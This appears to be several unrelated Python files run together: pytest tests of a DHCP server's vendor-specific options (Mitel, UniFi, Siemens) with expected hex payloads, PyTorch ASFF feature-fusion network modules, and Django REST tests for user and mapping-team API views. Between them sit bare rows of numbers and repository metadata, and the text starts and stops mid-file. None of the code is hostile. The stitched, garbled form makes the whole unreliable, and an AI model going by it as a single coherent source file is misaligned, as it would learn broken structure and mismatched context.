# option 43 should have suboption code: 1 length: 4 with value 1APC hex:31415043, entire option 43 has length 6
srv_msg.response_check_option_content(43, 'value', 'HEX:010431415043')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_mitel():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"array": False, "code": 130, "encapsulate": "", "name": "mitel-option",
"record-types": "", "space": "vendor-1027", "type": "string"}]
my_class = [{"name": "VENDOR_CLASS_1027",
"option-data": [{"name": "vivso-suboptions", "data": "1027"},
{"name": "mitel-option", "space": "vendor-1027",
"data": "id:ipphone.mitel.com;sw_tftp=11.11.11.11;call_srv=10.10.10.10",
"always-send": True}]}]
world.dhcp_cfg["option-def"] = option
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(125)
srv_msg.client_does_include_with_value('vendor_class_id', '1027')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(125)
srv_msg.response_check_option_content(125, 'value', 'HEX:000004033F823D69643A697070686F6E652E6D6974656C2E636F6D3B73775F746674703D31312E31312E31312E31313B63616C6C5F7372763D31302E31302E31302E3130')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_mitel():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
my_class = [{"name": "VENDOR_CLASS_1027",
"option-def": [{"name": "vendor-encapsulated-options",
"code": 43, "type": "string"}],
"option-data": [{"name": "vendor-encapsulated-options",
"data": "id:ipphone.mitel.com;sw_tftp=11.11.11.11;call_srv=10.10.10.10"}]}]
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('vendor_class_id', '1027')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(43)
srv_msg.response_check_option_content(43, 'value', 'HEX:69643A697070686F6E652E6D6974656C2E636F6D3B73775F746674703D31312E31312E31312E31313B63616C6C5F7372763D31302E31302E31302E3130')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_unifi_address():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
my_class = [{"name": "VENDOR_CLASS_ubnt",
"option-def": [{"name": "vendor-encapsulated-options",
"type": "ipv4-address", "code": 43}],
"option-data": [{"name": "vendor-encapsulated-options",
"data": "192.0.2.11"}]}]
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('vendor_class_id', 'ubnt')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(43)
srv_msg.response_check_option_content(43, 'value', 'HEX:C000020B')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_unifi_address():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"name": "unifi-address", "code": 1, "array": False,
"space": "vendor-41112", "type": "ipv4-address"}]
my_class = [{"name": "VENDOR_CLASS_41112",
"option-data": [
{"name": "vivso-suboptions", "data": "41112"},
{"name": "unifi-address", "space": "vendor-41112",
"data": "192.0.2.11", "always-send": True}]}]
world.dhcp_cfg["option-def"] = option
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(125)
srv_msg.client_does_include_with_value('vendor_class_id', '41112')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(125)
srv_msg.response_check_option_content(125, 'value', 'HEX:0000A098060104C000020B')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_siemens():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"name": "vlanid", "code": 2, "array": False,
"encapsulate": "", "record-types": "",
"space": "339", "type": "uint32"},
{"name": "dls", "code": 3, "array": False,
"encapsulate": "", "record-types": "",
"space": "339", "type": "string"}]
my_class = [{"name": "VENDOR_CLASS_339",
"option-def": [{"name": "vendor-encapsulated-options", "code": 43,
"type": "empty", "encapsulate": "339"}],
"option-data": [{"name": "vendor-encapsulated-options"},
{"always-send": True, "data": "123",
"name": "vlanid", "space": "339"},
{"always-send": True, "data": "sdlp://192.0.2.11:18443",
"name": "dls", "space": "339"}]}]
world.dhcp_cfg["option-def"] = option
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('vendor_class_id', '339')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(43)
srv_msg.response_check_option_content(43, 'value', 'HEX:02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_siemens():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"name": "vlanid", "code": 2, "array": False,
"encapsulate": "", "record-types": "",
"space": "vendor-339", "type": "uint32"},
{"name": "dls", "code": 3, "array": False,
"encapsulate": "", "record-types": "",
"space": "vendor-339", "type": "string"}]
my_class = [{"name": "VENDOR_CLASS_339",
"option-data": [
{"name": "vivso-suboptions", "data": "339"},
{"always-send": True, "data": "123",
"name": "vlanid", "space": "vendor-339"},
{"always-send": True, "data": "sdlp://192.0.2.11:18443",
"name": "dls", "space": "vendor-339"}]}]
world.dhcp_cfg["option-def"] = option
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(125)
srv_msg.client_does_include_with_value('vendor_class_id', '339')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(125)
srv_msg.response_check_option_content(125, 'value', 'HEX:000001531F02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vivso_suboptions_siemens_defined_in_class():
# kea gitlab #1683
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"name": "vlanid", "code": 2, "array": False,
"encapsulate": "", "record-types": "",
"space": "vendor-339", "type": "uint32"},
{"name": "dls", "code": 3, "array": False,
"encapsulate": "", "record-types": "",
"space": "vendor-339", "type": "string"}]
my_class = [{"name": "VENDOR_CLASS_339",
"option-def": option,
"option-data": [
{"name": "vivso-suboptions", "data": "339"},
{"always-send": True, "data": "123",
"name": "vlanid", "space": "vendor-339"},
{"always-send": True, "data": "sdlp://192.0.2.11:18443",
"name": "dls", "space": "vendor-339"}]}]
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(125)
srv_msg.client_does_include_with_value('vendor_class_id', '339')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(125)
srv_msg.response_check_option_content(125, 'value', 'HEX:000001531F02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_siemens_defined_in_class():
# kea gitlab #1683
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"name": "vlanid", "code": 2, "array": False,
"encapsulate": "", "record-types": "",
"space": "339", "type": "uint32"},
{"name": "dls", "code": 3, "array": False,
"encapsulate": "", "record-types": "",
"space": "339", "type": "string"}]
my_class = [{"name": "VENDOR_CLASS_339",
"option-def": [{"name": "vendor-encapsulated-options", "code": 43,
"type": "empty", "encapsulate": "339"}] + option,
"option-data": [{"name": "vendor-encapsulated-options"},
{"always-send": True, "data": "123",
"name": "vlanid", "space": "339"},
{"always-send": True, "data": "sdlp://192.0.2.11:18443",
"name": "dls", "space": "339"}]}]
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('vendor_class_id', '339')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(43)
srv_msg.response_check_option_content(43, 'value', 'HEX:02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_options_space_siemens():
# kea gitlab #1682
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
option = [{"name": "vlanid", "code": 2, "array": False,
"encapsulate": "", "record-types": "",
"space": "vendor-encapsulated-options-space", "type": "uint32"},
{"name": "dls", "code": 3, "array": False,
"encapsulate": "", "record-types": "",
"space": "vendor-encapsulated-options-space", "type": "string"}]
my_class = [{"name": "VENDOR_CLASS_339",
"option-def": [{"name": "vendor-encapsulated-options", "code": 43,
"type": "empty"}],
"option-data": [{"name": "vendor-encapsulated-options"},
{"always-send": True, "data": "123", "name": "vlanid",
"space": "vendor-encapsulated-options-space"},
{"always-send": True, "data": "sdlp://192.0.2.11:18443", "name": "dls",
"space": "vendor-encapsulated-options-space"}]}]
world.dhcp_cfg["option-def"] = option
world.dhcp_cfg["client-classes"] = my_class
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('vendor_class_id', '339')
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(43)
srv_msg.response_check_option_content(43, 'value', 'HEX:02040000007B031773646C703A2F2F3139322E302E322E31313A3138343433')
| 43.416486
| 199
| 0.628329
| 2,566
| 20,015
| 4.606391
| 0.063523
| 0.053807
| 0.059898
| 0.054653
| 0.915651
| 0.901777
| 0.887563
| 0.87022
| 0.860406
| 0.836125
| 0
| 0.108512
| 0.211741
| 20,015
| 460
| 200
| 43.51087
| 0.640679
| 0.019485
| 0
| 0.803867
| 0
| 0.005525
| 0.297093
| 0.106782
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030387
| false
| 0.033149
| 0.013812
| 0
| 0.044199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b736b3afaf63c5f284a48d5c41b15a2fd8466f86
| 13,096
|
py
|
Python
|
nb/torch/blocks/asff_blocks.py
|
jinfagang/nb
|
2b46577c2252a4fc28232faf8973088192bdd096
|
[
"Apache-2.0"
] | 161
|
2020-09-11T08:17:13.000Z
|
2022-03-29T01:48:17.000Z
|
nb/torch/blocks/asff_blocks.py
|
yangdeai/nb
|
9e81bd96310a3fdad8553a9910e18b7a6accee7a
|
[
"Apache-2.0"
] | 7
|
2020-12-04T12:43:48.000Z
|
2021-07-30T05:21:19.000Z
|
nb/torch/blocks/asff_blocks.py
|
yangdeai/nb
|
9e81bd96310a3fdad8553a9910e18b7a6accee7a
|
[
"Apache-2.0"
] | 36
|
2020-09-15T02:48:16.000Z
|
2022-03-24T06:56:16.000Z
|
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
from .conv_blocks import ConvBase
"""
ASFF blocks which better than RFBnet
code token from: https://github.com/ruinmessi/ASFF/blob/master/models/network_blocks.py
with some our own modifications
"""
class ASFFmobile(nn.Module):
def __init__(self, level, rfb=False, vis=False, act_cfg=dict(type='ReLU6')):
super(ASFFmobile, self).__init__()
self.level = level
self.dim = [512, 256, 128]
self.inter_dim = self.dim[self.level]
if level == 0:
self.stride_level_1 = ConvBase(
256, self.inter_dim, 3, 2, act_cfg=act_cfg)
self.stride_level_2 = ConvBase(
128, self.inter_dim, 3, 2, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, 1024, 3, 1, act_cfg=act_cfg)
elif level == 1:
self.compress_level_0 = ConvBase(
512, self.inter_dim, 1, 1, act_cfg=act_cfg)
self.stride_level_2 = ConvBase(
128, self.inter_dim, 3, 2, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, 512, 3, 1, act_cfg=act_cfg)
elif level == 2:
self.compress_level_0 = ConvBase(
512, self.inter_dim, 1, 1, act_cfg=act_cfg)
self.compress_level_1 = ConvBase(
256, self.inter_dim, 1, 1, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, 256, 3, 1, act_cfg=act_cfg)
# when adding rfb, we use half number of channels to save memory
compress_c = 8 if rfb else 16
self.weight_level_0 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_level_1 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_level_2 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_levels = nn.Conv2d(
compress_c*3, 3, kernel_size=1, stride=1, padding=0)
self.vis = vis
def forward(self, x_level_0, x_level_1, x_level_2):
if self.level == 0:
level_0_resized = x_level_0
level_1_resized = self.stride_level_1(x_level_1)
level_2_downsampled_inter = F.max_pool2d(
x_level_2, 3, stride=2, padding=1)
level_2_resized = self.stride_level_2(level_2_downsampled_inter)
elif self.level == 1:
level_0_compressed = self.compress_level_0(x_level_0)
level_0_resized = F.interpolate(
level_0_compressed, scale_factor=2, mode='nearest')
level_1_resized = x_level_1
level_2_resized = self.stride_level_2(x_level_2)
elif self.level == 2:
level_0_compressed = self.compress_level_0(x_level_0)
level_0_resized = F.interpolate(
level_0_compressed, scale_factor=4, mode='nearest')
level_1_compressed = self.compress_level_1(x_level_1)
level_1_resized = F.interpolate(
level_1_compressed, scale_factor=2, mode='nearest')
level_2_resized = x_level_2
level_0_weight_v = self.weight_level_0(level_0_resized)
level_1_weight_v = self.weight_level_1(level_1_resized)
level_2_weight_v = self.weight_level_2(level_2_resized)
levels_weight_v = torch.cat(
(level_0_weight_v, level_1_weight_v, level_2_weight_v), 1)
levels_weight = self.weight_levels(levels_weight_v)
levels_weight = F.softmax(levels_weight, dim=1)
fused_out_reduced = level_0_resized * levels_weight[:, 0:1, :, :] +\
level_1_resized * levels_weight[:, 1:2, :, :] +\
level_2_resized * levels_weight[:, 2:, :, :]
out = self.expand(fused_out_reduced)
if self.vis:
return out, levels_weight, fused_out_reduced.sum(dim=1)
else:
return out
class ASFF(nn.Module):
def __init__(self, level, multiplier=1, rfb=False, vis=False, act_cfg=dict(type='LeakyReLU')):
"""
normally, multiplier should be 1, 0.5
which means, the channel of ASFF can be
512, 256, 256 -> multiplier=1
256, 128, 128 -> multiplier=0.5
For even smaller, you gonna need change code manually.
If you got any question about this, consult me via wechat: jintianiloveu
"""
super(ASFF, self).__init__()
self.level = level
self.dim = [int(512*multiplier), int(256*multiplier),
int(256*multiplier)]
# print(self.dim)
self.inter_dim = self.dim[self.level]
if level == 0:
self.stride_level_1 = ConvBase(
int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
self.stride_level_2 = ConvBase(
int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, int(
1024*multiplier), 3, 1, act_cfg=act_cfg)
elif level == 1:
self.compress_level_0 = ConvBase(
int(512*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
self.stride_level_2 = ConvBase(
int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, int(512*multiplier), 3, 1)
elif level == 2:
self.compress_level_0 = ConvBase(
int(512*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, int(
256*multiplier), 3, 1, act_cfg=act_cfg)
# when adding rfb, we use half number of channels to save memory
compress_c = 8 if rfb else 16
self.weight_level_0 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_level_1 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_level_2 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_levels = nn.Conv2d(
compress_c*3, 3, kernel_size=1, stride=1, padding=0)
self.vis = vis
def forward(self, x_level_0, x_level_1, x_level_2):
"""
from small -> large
"""
if self.level == 0:
level_0_resized = x_level_0
level_1_resized = self.stride_level_1(x_level_1)
level_2_downsampled_inter = F.max_pool2d(
x_level_2, 3, stride=2, padding=1)
level_2_resized = self.stride_level_2(level_2_downsampled_inter)
elif self.level == 1:
level_0_compressed = self.compress_level_0(x_level_0)
level_0_resized = F.interpolate(
level_0_compressed, scale_factor=2, mode='nearest')
level_1_resized = x_level_1
level_2_resized = self.stride_level_2(x_level_2)
elif self.level == 2:
level_0_compressed = self.compress_level_0(x_level_0)
level_0_resized = F.interpolate(
level_0_compressed, scale_factor=4, mode='nearest')
level_1_resized = F.interpolate(
x_level_1, scale_factor=2, mode='nearest')
level_2_resized = x_level_2
level_0_weight_v = self.weight_level_0(level_0_resized)
level_1_weight_v = self.weight_level_1(level_1_resized)
level_2_weight_v = self.weight_level_2(level_2_resized)
levels_weight_v = torch.cat(
(level_0_weight_v, level_1_weight_v, level_2_weight_v), 1)
levels_weight = self.weight_levels(levels_weight_v)
levels_weight = F.softmax(levels_weight, dim=1)
fused_out_reduced = level_0_resized * levels_weight[:, 0:1, :, :] +\
level_1_resized * levels_weight[:, 1:2, :, :] +\
level_2_resized * levels_weight[:, 2:, :, :]
out = self.expand(fused_out_reduced)
if self.vis:
return out, levels_weight, fused_out_reduced.sum(dim=1)
else:
return out
class ASFFV5(nn.Module):
def __init__(self, level, multiplier=1, rfb=False, vis=False, act_cfg=dict(type='LeakyReLU')):
"""
this is ASFF version for YoloV5 only.
Since YoloV5 outputs 3 layer of feature maps with different channels
which is different than YoloV3
normally, multiplier should be 1, 0.5
which means, the channel of ASFF can be
512, 256, 128 -> multiplier=1
256, 128, 64 -> multiplier=0.5
For even smaller, you gonna need change code manually.
If you got any question about this, consult me via wechat: jintianiloveu
"""
super(ASFFV5, self).__init__()
self.level = level
self.dim = [int(1024*multiplier), int(512*multiplier),
int(256*multiplier)]
# print(self.dim)
self.inter_dim = self.dim[self.level]
if level == 0:
self.stride_level_1 = ConvBase(
int(512*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
self.stride_level_2 = ConvBase(
int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, int(
1024*multiplier), 3, 1, act_cfg=act_cfg)
elif level == 1:
self.compress_level_0 = ConvBase(
int(1024*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
self.stride_level_2 = ConvBase(
int(256*multiplier), self.inter_dim, 3, 2, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, int(512*multiplier), 3, 1)
elif level == 2:
self.compress_level_0 = ConvBase(
int(1024*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
self.compress_level_1 = ConvBase(
int(512*multiplier), self.inter_dim, 1, 1, act_cfg=act_cfg)
self.expand = ConvBase(self.inter_dim, int(
256*multiplier), 3, 1, act_cfg=act_cfg)
# when adding rfb, we use half number of channels to save memory
compress_c = 8 if rfb else 16
self.weight_level_0 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_level_1 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_level_2 = ConvBase(
self.inter_dim, compress_c, 1, 1, act_cfg=act_cfg)
self.weight_levels = nn.Conv2d(
compress_c*3, 3, kernel_size=1, stride=1, padding=0)
self.vis = vis
def forward(self, x_level_0, x_level_1, x_level_2):
"""
# 128, 256, 512
512, 256, 128
from small -> large
"""
# print('x_level_0: ', x_level_0.shape)
# print('x_level_1: ', x_level_1.shape)
# print('x_level_2: ', x_level_2.shape)
if self.level == 0:
level_0_resized = x_level_0
level_1_resized = self.stride_level_1(x_level_1)
level_2_downsampled_inter = F.max_pool2d(
x_level_2, 3, stride=2, padding=1)
# print('128 ', level_2_downsampled_inter.shape)
level_2_resized = self.stride_level_2(level_2_downsampled_inter)
elif self.level == 1:
level_0_compressed = self.compress_level_0(x_level_0)
level_0_resized = F.interpolate(
level_0_compressed, scale_factor=2, mode='nearest')
level_1_resized = x_level_1
level_2_resized = self.stride_level_2(x_level_2)
elif self.level == 2:
level_0_compressed = self.compress_level_0(x_level_0)
level_0_resized = F.interpolate(
level_0_compressed, scale_factor=4, mode='nearest')
x_level_1_compressed = self.compress_level_1(x_level_1)
level_1_resized = F.interpolate(
x_level_1_compressed, scale_factor=2, mode='nearest')
level_2_resized = x_level_2
# print('level: {}, l1_resized: {}, l2_resized: {}'.format(self.level,
# level_1_resized.shape, level_2_resized.shape))
level_0_weight_v = self.weight_level_0(level_0_resized)
level_1_weight_v = self.weight_level_1(level_1_resized)
level_2_weight_v = self.weight_level_2(level_2_resized)
# print('level_0_weight_v: ', level_0_weight_v.shape)
# print('level_1_weight_v: ', level_1_weight_v.shape)
# print('level_2_weight_v: ', level_2_weight_v.shape)
levels_weight_v = torch.cat(
(level_0_weight_v, level_1_weight_v, level_2_weight_v), 1)
levels_weight = self.weight_levels(levels_weight_v)
levels_weight = F.softmax(levels_weight, dim=1)
fused_out_reduced = level_0_resized * levels_weight[:, 0:1, :, :] +\
level_1_resized * levels_weight[:, 1:2, :, :] +\
level_2_resized * levels_weight[:, 2:, :, :]
out = self.expand(fused_out_reduced)
if self.vis:
return out, levels_weight, fused_out_reduced.sum(dim=1)
else:
return out
| 42.109325
| 98
| 0.615913
| 1,864
| 13,096
| 3.988734
| 0.082618
| 0.058911
| 0.061332
| 0.053262
| 0.909617
| 0.89657
| 0.8846
| 0.879892
| 0.86039
| 0.859987
| 0
| 0.05754
| 0.286042
| 13,096
| 310
| 99
| 42.245161
| 0.737647
| 0.107056
| 0
| 0.880734
| 0
| 0
| 0.007611
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027523
| false
| 0
| 0.022936
| 0
| 0.091743
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f7991be7d20b4c52bbf7ad03a0436ffc67b4aee
| 19,705
|
py
|
Python
|
osmchadjango/users/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/users/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/users/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
from django.urls import reverse
from rest_framework.test import APITestCase
from social_django.models import UserSocialAuth
from ..models import User, MappingTeam
from ...changeset.tests.modelfactories import ChangesetFactory
from ...changeset.models import Changeset
class TestCurrentUserDetailAPIView(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test',
password='password',
email='a@a.com'
)
self.social_auth = UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.social_auth.set_extra_data({'avatar': 'http://theurl.org/pic.jpg'})
self.url = reverse('users:detail')
def test_view_unauthenticated(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 401)
def test_get_view(self):
self.client.login(username='test', password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('id'), self.user.id)
self.assertEqual(response.data.get('username'), 'test')
self.assertEqual(response.data.get('email'), 'a@a.com')
self.assertEqual(response.data.get('uid'), '123123')
self.assertEqual(response.data.get('is_staff'), False)
self.assertEqual(response.data.get('is_active'), True)
self.assertEqual(response.data.get('avatar'), 'http://theurl.org/pic.jpg')
self.assertEqual(response.data.get('whitelists'), [])
self.assertFalse(response.data.get('comment_feature'))
self.assertFalse('password' in response.data.keys())
def test_update_view(self):
self.client.login(username='test', password='password')
data = {
"username": "test_user",
"email": "admin@a.com",
"is_staff": "true",
"message_good": "Hello! Awesome edit!",
"message_bad": "Hello! I found an error in your edit...",
"comment_feature": True
}
response = self.client.put(self.url, data)
self.assertEqual(response.status_code, 200)
response = self.client.get(self.url)
self.assertEqual(response.data.get('email'), 'admin@a.com')
self.assertEqual(response.data.get('username'), 'test')
self.assertFalse(response.data.get('is_staff'))
self.assertEqual(
response.data.get('message_good'),
'Hello! Awesome edit!'
)
self.assertEqual(
response.data.get('message_bad'),
'Hello! I found an error in your edit...'
)
self.assertTrue(response.data.get('comment_feature'))
def test_username_serialization(self):
self.user.name = 'test user'
self.user.save()
self.client.login(username='test', password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('id'), self.user.id)
self.assertEqual(response.data.get('username'), 'test user')
def test_uid_field_of_non_social_user(self):
self.user_2 = User.objects.create_user(
username='test_2',
password='password',
email='b@a.com'
)
self.client.login(username='test_2', password='password')
response = self.client.get(self.url)
self.assertEqual(response.data.get('uid'), None)
self.assertEqual(response.data.get('avatar'), None)
class TestSocialAuthAPIView(APITestCase):
def setUp(self):
self.url = reverse('users:social-auth')
def test_get_response(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 405)
def test_receive_oauth_token(self):
response = self.client.post(self.url)
self.assertEqual(response.status_code, 200)
self.assertIn('oauth_token', response.data.keys())
self.assertIn('oauth_token_secret', response.data.keys())
class TestMappingTeamListCreateAPIView(APITestCase):
def setUp(self):
self.url = reverse('users:mapping-team')
self.user = User.objects.create_user(
username='test',
password='password',
email='a@a.com'
)
self.social_auth = UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.payload = {
"name": "Map Company",
"users": [
{
"username" : "test_1",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "989",
"dol" : ""
},
{
"username" : "test_2",
"doj" : "2017-02-13T00:00:00Z",
"uid" : "987",
"dol" : ""
}
],
"trusted": True
}
def test_unauthenticated(self):
response = self.client.post(self.url, data=self.payload)
self.assertEqual(response.status_code, 401)
response = self.client.get(self.url)
self.assertEqual(response.status_code, 401)
def test_create_authenticated(self):
self.client.login(username='test', password='password')
response = self.client.post(self.url, data=self.payload)
self.assertEqual(response.status_code, 201)
